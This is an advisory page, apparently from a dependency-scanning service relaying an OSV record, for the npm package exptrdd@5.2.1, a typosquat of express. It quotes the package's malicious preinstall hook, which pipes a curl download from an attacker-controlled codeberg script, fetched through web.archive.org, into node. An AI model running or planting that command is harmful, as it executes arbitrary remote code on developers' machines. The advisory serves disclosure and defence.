exptrdd@5.2.1
Vulnerability report · Last retrieved from osv.dev September 29, 2026 at 3:09 PM UTC
OSV ID
MAL-2026-17245
Ecosystem
npm
Summary
package.json declares a preinstall lifecycle that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching an unpinned script from a mutable branch and piping it directly into node on every npm install. The fetched code runs with the installer's privileges and can perform arbitrary actions on the host. The package identity is a typosquat of express: name is exptrdd while the description, keywords, author, and repository fields are copied verbatim from expressjs/express, so developers who mistype express install the dropper. The remote source (codeberg branch, proxied through web.archive.org) is attacker-controlled and mutable, so the executed payload can change at any time without a package republish.
Source: amazon-inspector (6ba0b22d41f4edf82552b79417b6660bc1aaf311e4ec597b31674f0b6fdd5314)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.